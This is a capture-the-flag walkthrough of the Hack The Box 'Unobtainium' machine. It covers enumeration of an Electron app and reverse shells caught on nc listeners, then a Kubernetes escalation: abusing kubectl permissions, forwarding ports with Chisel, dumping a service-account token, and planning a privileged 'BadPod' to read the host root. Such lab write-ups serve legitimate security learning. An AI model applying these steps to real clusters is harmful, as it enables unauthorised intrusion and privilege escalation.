Introduction
OS: Linux
Difficulty: Hard
Points: 40
Release: 10 Apr 2021
IP: 10.10.10.235
Information Gathering
First, run nmap as usual.
┌──(root💀kali)-[~/hackthebox/machine/unobtainium]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.235

PORT      STATE SERVICE          VERSION
22/tcp    open  ssh              OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http             Apache httpd 2.4.41 ((Ubuntu))
2379/tcp  open  ssl/etcd-client?
2380/tcp  open  ssl/etcd-server?
8443/tcp  open  ssl/https-alt
10250/tcp open  ssl/http         Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
10256/tcp open  http             Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
31337/tcp open  http             Node.js Express framework
There are a lot of open ports.
Let's start with port 80.
Port 80
There is a simple HTML page.
Let's download the .deb package. I am using Kali Linux.
Unzipping the downloaded archive gives us a .deb package.
Let's extract the files inside the .deb package without installing it.
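A minimal sketch of the extraction (dpkg -x unpacks a package's data archive into a target directory without installing anything; the package file name matches the one listed later in this walkthrough):

# unpack the .deb contents into ./stuff without installing the package
dpkg -x unobtainium_1.0.0_amd64.deb stuff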
Inside stuff/opt/unobtainium/ there is an executable called unobtainium.
Let’s run that
┌──(root💀kali)-[~/hackthebox/machine/unobtainium/stuff/opt/unobtainium]
└─# ls
chrome_100_percent.pak  libEGL.so             libvulkan.so            resources          unobtainium
chrome_200_percent.pak  libffmpeg.so          LICENSE.electron.txt    resources.pak      v8_context_snapshot.bin
chrome-sandbox          libGLESv2.so          LICENSES.chromium.html  snapshot_blob.bin  vk_swiftshader_icd.json
icudtl.dat              libvk_swiftshader.so  locales                 swiftshader

┌──(root💀kali)-[~/hackthebox/machine/unobtainium/stuff/opt/unobtainium]
└─# ./unobtainium --no-sandbox
(node:2278) electron: The default of contextIsolation is deprecated and will be changing from false to true in a future release of Electron. See https://github.com/electron/electron/issues/23506 for more information
We get the error "Unable to reach unobtainium.htb".
Let’s add unobtainium.htb in our /etc/hosts file.
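A one-liner for that on the attacking machine (run as root):

# map the hostname from the error to the target IP
echo "10.10.10.235 unobtainium.htb" >> /etc/hosts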
Let's open the executable again; this time we don't get the error.
This executable appears to contact a server, so to capture the traffic I ran Wireshark on tun0.
And I was right: when I click on Todo, the app sends a POST request to the server.
Let's check what was captured inside this POST request.
app.listen(3000);
console.log('Listening on port 3000...');
After reading the file I found nothing interesting, but I am fairly sure the server runs on Node.js or something similar. If so, there should be a package.json file listing the npm packages in use, and we can then look for known vulnerabilities in those specific packages.
Request:
POST /todo HTTP/1.1
Host: unobtainium.htb:31337
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
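The body of the captured request is truncated above. Purely as a hypothetical sketch, replaying such a JSON POST with curl might look like the following; the field names and placeholder values are illustrative assumptions, not the captured data:

# hypothetical replay of the captured request; substitute the JSON body seen in Wireshark
curl -s -X POST http://unobtainium.htb:31337/todo \
  -H "Content-Type: application/json" \
  -d '{"auth": {"name": "<captured-user>", "password": "<captured-pass>"}, "filename": "todo.txt"}'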
┌──(root💀kali)-[~/hackthebox/machine/unobtainium]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.235.
Ncat: Connection from 10.10.10.235:57654.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@webapp-deployment-5d764566f4-h5zhw:/usr/src/app# id
id
uid=0(root) gid=0(root) groups=0(root)
root@webapp-deployment-5d764566f4-h5zhw:/usr/src/app# whoami
whoami
root
Boom, we got the shell.
First, let's grab user.txt, which is inside /root/.
root@webapp-deployment-5d764566f4-h5zhw:~# ls
ls
user.txt
root@webapp-deployment-5d764566f4-h5zhw:~# cat user.txt
cat user.txt
a6649836e48c4a2fef53804d75c1c1f3
Privilege Escalation
If you notice, we are already root; I think we're inside a Docker container.
Anyway, let's run LinPEAS.
There is a cron job running that removes kubectl from the container every minute. But there is no kubectl executable in the container to begin with.
Let's download a kubectl binary and transfer it into the container's /tmp folder.
Install and Set Up kubectl on Linux
┌──(root💀kali)-[~/hackthebox/machine/unobtainium]
└─# curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   154  100   154    0     0    107      0  0:00:01  0:00:01 --:--:--   107
100 44.2M  100 44.2M    0     0  2972k      0  0:00:15  0:00:15 --:--:-- 3193k

┌──(root💀kali)-[~/hackthebox/machine/unobtainium]
└─# ls
Exploit.sh         kubectl  message.json  unobtainium_1.0.0_amd64.deb         unobtainium_debian.zip
exploit_stage2.sh  luci.sh  stuff         unobtainium_1.0.0_amd64.deb.md5sum

┌──(root💀kali)-[~/hackthebox/machine/unobtainium]
└─# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
We rename kubectl to xkubectl so that the cron job doesn't remove it.
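A minimal sketch of the transfer, assuming our tun0 address is 10.10.14.x (substitute your own) and the Python HTTP server from above is still serving on port 8000:

# inside the webapp container: fetch the binary under a new name and make it executable
cd /tmp
wget http://10.10.14.x:8000/kubectl -O xkubectl   # use curl -o if wget is missing
chmod +x xkubectl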
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl version --short
./xkubectl version --short
Client Version: v1.21.0
Server Version: v1.20.0
Now let's check our current rights with kubectl against privileged resources like secrets.
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list secrets
no
Let's check the namespaces.
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list namespaces
Warning: resource 'namespaces' is not namespace scoped
yes
Let’s list all the namespaces.
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl get namespace
./xkubectl get namespace
NAME              STATUS   AGE
default           Active   96d
dev               Active   95d
kube-node-lease   Active   96d
kube-public       Active   96d
kube-system       Active   96d
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list secrets -n dev
no
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list secrets -n kube-system
no
We can't list secrets in any namespace.
Let's check whether we have permission to list pods in the dev namespace.
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl auth can-i list pods -n dev
yes
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl get pods -n dev
NAME                                READY   STATUS    RESTARTS   AGE
devnode-deployment-cd86fb5c-6ms8d   1/1     Running   28         95d
devnode-deployment-cd86fb5c-mvrfz   1/1     Running   29         95d
devnode-deployment-cd86fb5c-qlxww   1/1     Running   29         95d
Pods
A Kubernetes cluster can have one or more nodes. Each node can have one or more Pods. Each Pod can have one or more running containers.
And as we saw in the previous command, there are three Pods in the dev namespace, each with a running container.
root@webapp-deployment-5d764566f4-h5zhw:/tmp# ./xkubectl describe pod/devnode-deployment-cd86fb5c-6ms8d -n dev
Name:         devnode-deployment-cd86fb5c-6ms8d
Namespace:    dev
Priority:     0
Node:         unobtainium/10.10.10.235
Start Time:   Sun, 17 Jan 2021 18:16:21 +0000
Labels:       app=devnode
              pod-template-hash=cd86fb5c
Annotations:  <none>
Status:       Running
IP:           172.17.0.5
IPs:
  IP:           172.17.0.5
Controlled By:  ReplicaSet/devnode-deployment-cd86fb5c
Containers:
  devnode:
    Container ID:   docker://bf852df0b8a7e049a21983112b178bfd65a3e27180c7463b441a7de2aeb1aedb
    Image:          localhost:5000/node_server
    Image ID:       docker-pullable://localhost:5000/node_server@sha256:f3bfd2fc13c7377a380e018279c6e9b647082ca590600672ff787e1bb918e37c
    Port:           3000/TCP
    Host Port:      0/TCP
    State:          Running
      Started:      Thu, 22 Apr 2021 19:28:37 +0000
    Last State:     Terminated
      Reason:       Error
      Exit Code:    137
      Started:      Wed, 24 Mar 2021 16:01:28 +0000
      Finished:     Wed, 24 Mar 2021 16:02:13 +0000
    Ready:          True
    Restart Count:  28
    Environment:    <none>
    Mounts:
      /var/run/secrets/kubernetes.io/serviceaccount from default-token-rmcd6 (ro)
Conditions:
  Type              Status
  Initialized       True
  Ready             True
  ContainersReady   True
  PodScheduled      True
Volumes:
  default-token-rmcd6:
    Type:        Secret (a volume populated by a Secret)
    SecretName:  default-token-rmcd6
    Optional:    false
QoS Class:       BestEffort
Node-Selectors:  <none>
Tolerations:     node.kubernetes.io/not-ready:NoExecute op=Exists for 300s
                 node.kubernetes.io/unreachable:NoExecute op=Exists for 300s
Events:          <none>
Notice the difference: I am in a webapp-deployment container, enumerating devnode-deployment containers in Pods running in the dev namespace.
We are looking at two different environments: the classic production environment and the development environment. I should be able to repeat the same steps; I just have to turn RHOST and RPORT into variables, upload the exploit to the container I'm currently in, and run it against the dev environment to get another foothold there.
For that we need to forward a port to the devnode-deployment container at 172.17.0.5:3000.
I am using Chisel for that.
If you don't know how to use Chisel or where to download it, check this out:
chisel
First I run Chisel on my Kali machine to start the server.
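The Chisel session itself isn't reproduced here, but the forward looks roughly like this (a sketch: 10.10.14.x stands in for our tun0 address, port 8001 is an arbitrary choice, and the client binary must first be uploaded to the webapp container):

# on Kali: start a chisel server that accepts reverse tunnels
./chisel server -p 8001 --reverse

# on the webapp container: expose the devnode pod back through the tunnel,
# so 127.0.0.1:3000 on Kali reaches 172.17.0.5:3000
./chisel client 10.10.14.x:8001 R:3000:172.17.0.5:3000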
┌──(root💀kali)-[~]
└─# nc -lvp 9002
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.235.
Ncat: Connection from 10.10.10.235:48266.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@devnode-deployment-cd86fb5c-6ms8d:/usr/src/app# id
id
uid=0(root) gid=0(root) groups=0(root)
root@devnode-deployment-cd86fb5c-6ms8d:/usr/src/app# whoami
whoami
root
Boom, we got a shell in the devnode-deployment container.
Now transfer the kubectl executable into this box again and check whether we can list secrets now, as sketched below.
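A sketch of those checks, assuming the same transfer trick as before; the kube-system namespace and the c-admin-token-tfmp2 secret name are taken from the decoded service-account token shown below, and the exact command sequence is my assumption:

# check and dump secrets from the devnode service account
./kubectl auth can-i list secrets -n kube-system
./kubectl get secrets -n kube-system
./kubectl describe secret c-admin-token-tfmp2 -n kube-system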
Data
====
ca.crt:     1066 bytes
namespace:  11 bytes
token:      eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLXRmbXAyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyNDYzNTA1Zi05ODNlLTQ1YmQtOTFmNy1jZDU5YmZlMDY2ZDAiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.Xk96pdC8wnBuIOm4Cgud9Q7zpoUNHICg7QAZY9EVCeAUIzh6rvfZJeaHucMiq8cm93zKmwHT-jVbAQyNfaUuaXmuek5TBdY94kMD5A_owFh-0kRUjNFOSr3noQ8XF_xnWmdX98mKMF-QxOZKCJxkbnLLd_h-P2hWRkfY8xq6-eUP8MYrYF_gs7Xm264A22hrVZxTb2jZjUj7LTFRchb7bJ1LWXSIqOV2BmU9TKFQJYCZ743abeVB7YvNwPHXcOtLEoCs03hvEBtOse2POzN54pK8Lyq_XGFJN0yTJuuQQLtwroF3579DBbZUkd4JBQQYrpm6Wdm9tjbOyGL9KRsNow
Let's pull the cluster info using the token.
root@devnode-deployment-cd86fb5c-6ms8d:/tmp# ./kubectl --token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLXRmbXAyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyNDYzNTA1Zi05ODNlLTQ1YmQtOTFmNy1jZDU5YmZlMDY2ZDAiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.Xk96pdC8wnBuIOm4Cgud9Q7zpoUNHICg7QAZY9EVCeAUIzh6rvfZJeaHucMiq8cm93zKmwHT-jVbAQyNfaUuaXmuek5TBdY94kMD5A_owFh-0kRUjNFOSr3noQ8XF_xnWmdX98mKMF-QxOZKCJxkbnLLd_h-P2hWRkfY8xq6-eUP8MYrYF_gs7Xm264A22hrVZxTb2jZjUj7LTFRchb7bJ1LWXSIqOV2BmU9TKFQJYCZ743abeVB7YvNwPHXcOtLEoCs03hvEBtOse2POzN54pK8Lyq_XGFJN0yTJuuQQLtwroF3579DBbZUkd4JBQQYrpm6Wdm9tjbOyGL9KRsNow cluster-info
Kubernetes control plane is running at https://10.96.0.1:443
KubeDNS is running at https://10.96.0.1:443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy

To further debug and diagnose cluster problems, use 'kubectl cluster-info dump'
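Passing that huge token inline gets unwieldy. As a small convenience (not part of the original walkthrough), we can stash it in a shell variable and reuse it:

# store the c-admin service-account token once, then reuse it
TOKEN="eyJhbGciOiJSUzI1NiIsImtpZCI6..."   # paste the full token from the secret above
./kubectl --token="$TOKEN" cluster-info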
Let's check whether we can create pods; if we can, we can use BadPods.
root@devnode-deployment-cd86fb5c-6ms8d:/tmp# ./kubectl --token=eyJhbGciOiJSUzI1NiIsImtpZCI6IkpOdm9iX1ZETEJ2QlZFaVpCeHB6TjBvaWNEalltaE1ULXdCNWYtb2JWUzgifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJjLWFkbWluLXRva2VuLXRmbXAyIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImMtYWRtaW4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiIyNDYzNTA1Zi05ODNlLTQ1YmQtOTFmNy1jZDU5YmZlMDY2ZDAiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06Yy1hZG1pbiJ9.Xk96pdC8wnBuIOm4Cgud9Q7zpoUNHICg7QAZY9EVCeAUIzh6rvfZJeaHucMiq8cm93zKmwHT-jVbAQyNfaUuaXmuek5TBdY94kMD5A_owFh-0kRUjNFOSr3noQ8XF_xnWmdX98mKMF-QxOZKCJxkbnLLd_h-P2hWRkfY8xq6-eUP8MYrYF_gs7Xm264A22hrVZxTb2jZjUj7LTFRchb7bJ1LWXSIqOV2BmU9TKFQJYCZ743abeVB7YvNwPHXcOtLEoCs03hvEBtOse2POzN54pK8Lyq_XGFJN0yTJuuQQLtwroF3579DBbZUkd4JBQQYrpm6Wdm9tjbOyGL9KRsNow auth can-i create pod
yes
Yes, we can create pods. Now let's create a BadPod where everything is allowed.
Bad Pod #1: Everything allowed
everything-allowed-exec-pod.yaml
I modified the everything-allowed-exec-pod.yaml file to get the root hash and saved it as luci.yaml.
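The modified file isn't shown in the post. Below is a sketch of what luci.yaml could look like, based on the upstream everything-allowed-exec-pod.yaml from the BadPods repository; pointing the pod at the dev namespace and at the localhost:5000/node_server image (seen in the pod description earlier, and handy because the node can't pull images from the internet) are my assumptions, not the author's confirmed choices:

# write the pod spec: a privileged pod that mounts the node's root filesystem at /host
cat > luci.yaml <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: luci
  namespace: dev                        # assumption: create it where we have rights
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: luci
    image: localhost:5000/node_server   # assumption: reuse the local registry image
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
EOF

# create the pod with the c-admin token, then read the root flag from the mounted host filesystem
./kubectl --token="$TOKEN" apply -f luci.yaml
./kubectl --token="$TOKEN" exec -it luci -n dev -- cat /host/root/root.txt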